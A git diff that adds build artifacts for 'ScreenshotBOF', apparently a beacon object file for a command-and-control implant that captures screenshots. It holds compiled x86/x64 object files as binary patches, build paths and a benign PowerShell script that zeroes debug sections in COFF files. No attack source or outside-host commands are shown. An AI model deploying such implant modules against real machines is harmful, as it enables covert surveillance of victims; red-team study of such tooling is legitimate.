+c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.write.1.tlog diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.recipe b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.recipe new file mode 100644 index 0000000..b68b3d1 --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.recipe @@ -0,0 +1,7 @@ + + + C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\bin\BOF\ScreenshotBOFx32 + + + + \ No newline at end of file diff --git a/ScreenshotBOF/intermediary/BOF/x86/source.obj b/ScreenshotBOF/intermediary/BOF/x86/source.obj new file mode 100644 index 0000000000000000000000000000000000000000..b128ff87f260bb6f6e5bd14a7da7c12418f8f413 GIT binary patch literal 4153 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 A&;S4c literal 0 HcmV?d00001 diff --git a/ScreenshotBOF/resources/strip_bof.ps1 b/ScreenshotBOF/resources/strip_bof.ps1 new file mode 100644 index 0000000..059809a --- /dev/null +++ b/ScreenshotBOF/resources/strip_bof.ps1 @@ -0,0 +1,127 @@ +function strip-bof { +<# +.SYNOPSIS + Removes debug symbols from a beacon object file + + Heavily dependent on code by Matthew Graeber (@mattifestation) + Original code: https://www.powershellgallery.com/packages/PowerSploit/1.0.0.0/Content/PETools%5CGet-ObjDump.ps1 + Author: Yasser Alhazmi (@yas_o_h) + License: BSD 3-Clause + +.PARAMETER Path + + Specifies a path to one or more object file locations. + +.EXAMPLE + + C:\PS>strip-bof -Path main.obj + +#> + + [CmdletBinding()] Param ( + [Parameter(Position = 0, Mandatory = $True)] + [ValidateScript({ Test-Path $_ })] + [String] + $Path + ) + + + $Code = @' + using System; + using System.IO; + using System.Text; + + namespace COFF + { + + + public class SECTION_HEADER + { + public string Name; + public uint PhysicalAddress; + public uint VirtualSize; + public uint VirtualAddress; + public uint SizeOfRawData; + public uint PointerToRawData; + public uint PointerToRelocations; + public uint PointerToLinenumbers; + public ushort NumberOfRelocations; + public ushort NumberOfLinenumbers; + public uint Characteristics; + public Byte[] RawData; + + public SECTION_HEADER(BinaryReader br) + { + this.Name = Encoding.UTF8.GetString(br.ReadBytes(8)).Split((Char) 0)[0]; + this.PhysicalAddress = br.ReadUInt32(); + this.VirtualSize = this.PhysicalAddress; + this.VirtualAddress = br.ReadUInt32(); + this.SizeOfRawData = br.ReadUInt32(); + this.PointerToRawData = br.ReadUInt32(); + this.PointerToRelocations = br.ReadUInt32(); + this.PointerToLinenumbers = br.ReadUInt32(); + this.NumberOfRelocations = br.ReadUInt16(); + this.NumberOfLinenumbers = br.ReadUInt16(); + this.Characteristics = br.ReadUInt32(); + } + } + + + public class HEADER + { + public ushort Machine; + public ushort NumberOfSections; + public uint TimeDateStamp; + public uint PointerToSymbolTable; + public uint NumberOfSymbols; + public ushort SizeOfOptionalHeader; + public ushort Characteristics; + + public HEADER(BinaryReader br) + { + this.Machine = br.ReadUInt16(); + this.NumberOfSections = br.ReadUInt16(); + this.TimeDateStamp = br.ReadUInt32(); + this.PointerToSymbolTable = br.ReadUInt32(); + this.NumberOfSymbols = br.ReadUInt32(); + this.SizeOfOptionalHeader = br.ReadUInt16(); + this.Characteristics = br.ReadUInt16(); + } + } +} +'@ + + Add-Type -TypeDefinition $Code + Write-Host "enumerating sections..." + try { + $FileStream = [IO.File]::OpenRead($Path) + $BinaryReader = New-Object IO.BinaryReader($FileStream) + $CoffHeader = New-Object COFF.HEADER($BinaryReader) + + # Parse section headers + $SectionHeaders = New-Object COFF.SECTION_HEADER[]($CoffHeader.NumberOfSections) + + for ($i = 0; $i -lt $CoffHeader.NumberOfSections; $i++) + { + $SectionHeaders[$i] = New-Object COFF.SECTION_HEADER($BinaryReader) + + if($SectionHeaders[$i].Name.Contains("debug")){ + Write-Host "found debug section.. zeroing it..." + $FileStream.Close(); + $FileStream2 = [IO.File]::OpenWrite($Path) + $FileStream2.Seek($SectionHeaders[$i].PointerToRawData, 'Begin') | Out-Null + for($x = 0; $x -lt $SectionHeaders[$i].SizeOfRawData; $x++){ + $FileStream2.WriteByte(0) + } + Write-Host "closing stream..."; + $FileStream2.Close(); + Write-Host "done!"; + return; + } + } + } catch { + Add-Type -AssemblyName PresentationFramework + [System.Windows.MessageBox]::Show("error stripping debug symbols: " + $_.ToString()); + return; + } +} \ No newline at end of file diff --git a/bin/BOF/ScreenshotBOF.x64.obj b/bin/BOF/ScreenshotBOF.x64.obj new file mode 100644 index 0000000000000000000000000000000000000000..6f339ac2787c9b38f6753998d22f77b7e5c04a07 GIT binary patch literal 5239 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 literal 0 HcmV?d00001 diff --git a/bin/BOF/ScreenshotBOF.x86.obj b/bin/BOF/ScreenshotBOF.x86.obj new file mode 100644 index 0000000000000000000000000000000000000000..d9e59fd2959b0b1f5a04d9a9137afecf1873100a GIT binary patch literal 4153 zcmds4TWnNC7@pFyR4BAjRJ?Mm1&YOW*sdlAvVvX@iX!?wHbo{~aR zsjd%fjy0MP#Y7VyG#Wz!4{}joT188|B#1SZq?*Q*q=YrDq0v56>pwH+vfWeTyOZq9 zcfS8J|NQgM**V^d<>>O?!C3Gngtj8qtnrK(lMjjNBN_!TsXb`p$~t6?i_!l54FQds z0PuE&_QXaW)j6%1ctnmE{5gRA%Zz7&cx2o>-EHuv|j0 z%uAQoz0)D!Ks~o;LI0zN#tm66B6Az!o40cSZ37!@t;qp|+@65X>)4H+eP9n4jARdr zaV{!GVyQk(PI2i>qEF7oGNRbWMf&1gHgZTLd_0jo2)TK-X%FWkDgmZK#Bm~zCgk2o z+G@2T#H_OiQnEGLn=Y|Y-7;0`nVOdAhm=CDU^_rILP86-k}-FoTJkcO#|25yU{Tts z!6~UrgOduLYQlv)o>qj(CZU)YW;926Jg0=_{F>&xf@ge+Fx_2B&MJ5o$oXzfYy1F* zzClW;=vQz7By*rX19;jeL4>86m$Z49sS=v?OUoE$efg@!FgeXg!4u$jwtGfhY`K~e z8i)DjeX3hMHWIcrC5c*uQvfvb#&Fo@Ja$gn7@7}5YA;W^0U#oN}x{X@f7SX6xy)2uCZHkYHOcRLKAv<6+ed8 zBO2}>QU;4R-jixIrSaV0IFcK+og*28u*Yd>X*$zJl8CTK>H|t}*uAn5;OTB4VdX}i zbA!`J-Y8Wpu4Y3{_CT8u_G<{CYH69abv!8yZRSF5u&~g-qIu-nixB;Jr$F~+L=nh} zVg8mpo`i#y7d~sg+>;M|**pSyy$IpuMqBd2R}vZyUGht7hVcjlT2MEhu?n69t_XEl zP^Tl6&n8xc302pS(!vPuRiL2BpA*TZ1=T`dN70?o-%Qa49ocmBsE(cnbPN0}i2T{E zrRWIs-vHH6 zZXSAgAHs}PP*1BVR|AOY-2;fty9vdX6xji7 zqNr1s`gQ4EKrH$rfSRb@cYwA~bWKM$0Fk3=L4N_-OwkHB@()n-*q*cR|2TW5spiVu z54FeJ?b)dhpFeyR^|T~6{qb|dMK37P#>Y~Ow17z^SX&S zZDPJPG2{$sjm2YO10@-}-^4gfOxVN>nwU3C%vlrjy@~nV#MF^;QyUXL2#gO_V(dFP z!9zMzdfQ(PmX#Icgf4Dbun30}z3Fh+NiU4_CfK8K>|Wl`A}hid*&!0CgHQHD=I0sKi)0em7PojP5ffdJbhg|j2$?^y)ARWx z_V2`A*qe@IDjG>TlF3xeFf5aLQ?Y|a=JY88GVn`>$~MXuf#u6$$+XPYFGiAyBcdiQ zTP9hI2X-^d+x6s>1r+Loa7#ie6Su<`juEdeq